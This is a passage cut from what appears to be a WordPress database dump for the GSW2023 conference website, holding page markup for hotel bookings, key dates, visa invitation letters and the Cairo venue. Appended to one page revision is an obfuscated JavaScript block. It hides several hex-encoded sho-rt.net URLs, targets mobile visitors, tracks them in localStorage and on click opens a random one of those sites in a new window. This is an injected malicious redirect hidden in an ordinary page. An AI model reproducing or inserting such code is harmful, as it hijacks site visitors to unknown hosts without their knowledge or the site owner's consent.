style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 17:45:21','2023-08-16 17:45:21','',3066,'https://gsw2023.com/?p=5303',0,'revision','',0),
(5304,1,'2023-08-16 17:46:41','2023-08-16 17:46:41','','main_u7','','inherit','open','closed','','main_u7-5','','','2023-08-16 17:46:41','2023-08-16 17:46:41','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/main_u7-4.jpg',0,'attachment','image/jpeg',0),
(5305,1,'2023-08-16 18:25:29','2023-08-16 18:25:29','[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\r\n</li>\r\n</ul>\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\r\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\r\n[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\r\n<h4></h4>\r\n<ul>\r\n 	<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" 